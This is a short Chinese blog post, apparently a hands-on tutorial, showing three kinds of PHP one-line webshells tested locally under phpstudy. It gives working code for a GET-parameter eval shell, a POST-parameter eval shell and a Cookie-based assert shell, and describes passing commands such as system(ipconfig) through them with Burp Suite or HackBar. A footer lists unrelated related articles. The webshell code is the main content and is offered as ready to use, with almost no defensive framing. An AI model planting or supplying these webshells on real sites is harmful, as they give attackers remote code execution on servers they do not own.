首页 > 其他分享 >【一句话木马实操】简单的3种类型

【一句话木马实操】简单的3种类型

时间:2024-03-24 23:59:31浏览次数:29  
标签:传参 Cookie 实操 木马 pass 类型 参数 post php

环境:phpstudy

目录

GET型

POST型

Cookie型 

GET型

使用get型一句话木马执行参数pass

php代码使用;结尾

<?php eval($_GET[pass]);?>

无相应代表被正确解析

输入pass参数

这里还发现system(ls)无法使用?可能是权限不够。

也可以使用?pass=system(ipconfig);

发现并无作用,所以只是调用cmd进行一些命令执行结果,但是无法对主机实施操控

 

POST型

<?php eval($_POST[pass]);?> 

post传参,bp抓包修改传参

或者使用hackbar进行post传参

 

Cookie型 

cookie.php获取

<?php @$a=$_COOKIE[1];$b='';$c='';@assert($b.$a);?>

其中,1相当于一个参数 

我改变了参数,使用pass参数,post方法传递命令

发现Cookie但是不能直接传递php命令

get型也可以

标签:传参,Cookie,实操,木马,pass,类型,参数,post,php
From: https://blog.csdn.net/m0_73629042/article/details/136998914

相关文章

  • [AIGC] SQL中的数据添加和操作:数据类型介绍
    SQL(结构化查询语言)作为一种强大的数据库查询和操作工具,它能够完成从简单查询到复杂数据操作的各种任务。在这篇文章中,我们主要讨论如何在SQL中添加(插入)数据,以及在数据操作过程中,会产生哪些类型的数据。文章目录如何在SQL中添加数据更新和删除数据更新数据删除数据......
  • C语言 04 基本数据类型
    整数整数就是不包含小数点的数字,整数包含以下几种类型:short:占用2个字节,16个bit位。int:占用4个字节,32个bit位,能够表示-2^32到2^32之间的数字,默认使用这种类型。long:占用8个字节,64个bit位。浮点浮点类型一般用于保存小数。为啥不叫小数类型而是浮点类......
  • C语言-结构体类型的认识
    1.前言:        因为C语言中的基本数据类型很少,不能描述很多现实中复杂的事物了,所以就引入了结构体类型。比如要描述生活中的人,用什么类型呢?如果只有基本数据类型,答案是什么都用不了,用char?int?double?好像都不太行。因为你人有年龄,姓名,身高等等信息要描述,一种基本数据......
  • JS数据类型
    【一】数据类型【1】JS中的数据类型简单数据类型:NumberStringundefinedBooleannull复杂数据类:Object【2】查看数据类型typeof方法console.log(typeof(...))【二】变量和常量js是一门拥有动态类型的语言varstr='hqq';varstr=123;varstr=[];//st......
  • 基于傅里叶描述子和HSV颜色特征的KNN水果类型识别,Matlab实现
           博主简介:专注、专一于Matlab图像处理学习、交流,matlab图像代码代做/项目合作可以联系(QQ:3249726188)       个人主页:Matlab_ImagePro-CSDN博客       原则:代码均由本人编写完成,非中介,提供有偿Matlab算法代码编程服务,不从事不违反涉及学术原则......
  • Java 学习路线:基础知识、数据类型、条件语句、函数、循环、异常处理、数据结构、面向
    Java基础什么是JavaJava是一种由SunMicrosystems于1995年首次发布的编程语言和计算平台。Java是一种通用的、基于类的、面向对象的编程语言,旨在减少实现依赖性。它是一个应用程序开发的计算平台。Java快速、安全、可靠,因此在笔记本电脑、数据中心、游戏机、科学超级计......
  • 指向结构体类型数据的指针
    一个结构体变量的指针就是该变量所占据的内存段的起始地址。可以设一个指针变量.用来指向一个结构体变量,此时该指针变量的值是结构体变量的起始地址。指针变量也可以用来指向结构体数组中的元素。1指向结构体变量的指针下面通过一个简单例子来说明指向结构体变量的指针变量的......
  • Struts2中type类型有哪些?Struts2默认能解决get和post提交方式的乱码问题吗?Struts2中如
    Struts2中type类型有哪些?Struts2中type类型指的是结果类型,用于指定Action执行完成后如何返回结果给客户端。Struts2框架提供了多种结果类型,以满足不同的业务需求和页面跳转方式。以下是一些常见的Struts2结果类型:dispatcher:这是默认的结果类型,相当于servlet的forward,即服......
  • 参数"news"隐式具有'any'类型 解决方法
    代码functionchangePage(news){router.push({name:'detail',//path:'news/detail',query:{id:news.id,title:news.title,content:news.content,}})}方法1在报错参数后加上:anyfunction......
  • 20240322,结构类型,枚举,
     一,枚举1.1常量符号化 程序中用符号表达数字,增加程序的可读性?#include<stdio.h>//能跑,但是报错不推荐将字符串转为CHAR**constintred=0;constintyellow=1;constintgreen=2;//为撒在前面?intmain(intargc,charconst*argv[]){ //两个参数,整数,字符串数组......